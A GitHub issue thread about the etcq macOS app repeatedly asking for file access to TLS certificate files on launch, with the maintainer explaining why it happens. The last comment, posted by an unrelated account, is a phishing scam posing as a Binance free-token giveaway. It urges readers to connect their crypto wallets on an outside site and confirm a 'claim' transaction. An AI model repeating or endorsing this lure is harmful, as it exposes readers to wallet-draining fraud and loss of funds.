### ISSUE TITLE
[macos] Persist granted permissions

### ISSUE THREAD

**Issue by devidw** [shockerli/etcq#2]
Hey

I am getting this dialog after closing and reopening the macos app

![Screenshot 2023-09-23 at 4 37 30 PM](https://github.com/shockerli/etcq/assets/68775926/94cd3e9f-d1fd-4166-b230-964307c083cf)

Would there eventually be a way to have the app remember granted permissions?

I guess this is needed for the certificate file access

Thanks

**Comment by shockerli** [comment]
This is the file access that is controlled by macOS and can be viewed through `System Settings - Privacy & Security - Files & Folders`

![image](https://github.com/shockerli/etcq/assets/5518985/e178c560-84f6-40ac-9463-7f5b7ee72edd)

**Comment by devidw** [comment]
Hey @shockerli 

Thanks for your answer

I can confirm that this perm is granted before app start up, but nevertheless etcq asks for it on every launch

![Screenshot 2023-09-26 at 3 42 40 PM](https://github.com/shockerli/etcq/assets/68775926/491597a3-ff23-4175-b43c-0b87fc84194d)

**Comment by shockerli** [comment]
ETCQ automatically connects to each ETCD server each time it is started.

If the HTTPS connection certificate is set, file permissions are requested. You can check whether the three configuration items `cert_file`, `key_file`, `ca_cert_file` are empty, ETCQ config file path is `~/Library/Application\ Support/ETCQ/etcd.json`

**Comment by devidw** [comment]
Yep that works fine - and i can confirm that the connection and the whole apps works great - also the config file is filled like it should

It's just a bit annoying that the permission needs to be granted on each app launch :D

**Comment by shockerli** [comment]
ETCQ does not collect any private data.

Currently, HTTPS connections directly use the certificate file path specified by the user. Therefore, when the application is launched and connects automatically, it does indeed access the file. The experience can be optimized in the future.

**Comment by devidw** [comment]
Gotcha, thanks for clarification, will keep this open - I guess we can close this when you eventually roll out a mechanisms to avoid prompting on each launch

**Comment by xcluz-git** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![https://www.bnbrewards.online/?source=github](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
